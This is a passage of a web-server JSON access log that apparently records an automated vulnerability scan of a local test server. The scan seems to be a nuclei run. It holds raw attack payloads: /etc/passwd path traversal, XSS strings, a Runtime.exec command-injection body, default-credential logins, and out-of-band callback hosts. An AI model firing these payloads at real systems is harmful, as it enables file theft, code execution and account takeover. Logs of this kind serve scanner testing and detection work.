+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /msa/../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/api.php?mobile/webNasIPS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"TNAS", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /search/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gallery/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/targets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://www.%5C.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"[{\x22query\x22:\x22query {\x5Cn __typename \x5Cn }\x22}, {\x22query\x22:\x22mutation { \x5Cn __typename \x5Cn }\x22}]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/48 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"username=admin&password=gophish&csrf_token={{replace(url_encode(html_unescape(csrf_token)), \x22+\x22, \x22%2B\x22)}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_ignition/health-check HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /e/ViewImg/index.html?url=javascript:alert(1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"username=admin&password=geoserver","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /geoserver/j_spring_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:/%5C/%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/xml/webuser-auth.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"j_username=admin&j_password=passw0rd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ibmmq/console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1/ibmmq/console/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.//WEB-INF/classes/META-INF/microprofile-config.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/49 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graphql?query={__typename} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@ca28fg0smpvbd3qg07h0dj5bwcaywsqz1.oast.live", "http_referer":"http://ca28fg0smpvbd3qg07h0rz857657qzxdg.oast.live/ref", "request_method":"GET", "http_x_forwarded_for":"spoofed.ca28fg0smpvbd3qg07h01f5t9sysupo7g.oast.live"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /info.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wptouch_switch=desktop&redirect=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_dashboards/app/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"username=admin&password=123","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/verify HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"127.0.0.1/login/index", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wt3/forceSave.php?file=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"{\x22query\x22:\x22query {\x5Cn __schema {\x5Cn directive\x5Cn }\x5Cn}\x22,\x22variables\x22:null}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:/%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common_page/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"j_username=app&j_password=passw0rd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ibmmq/console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1/ibmmq/console/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat+%2Fetc%2Fpasswd')]=nuclei","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /account HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/50 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 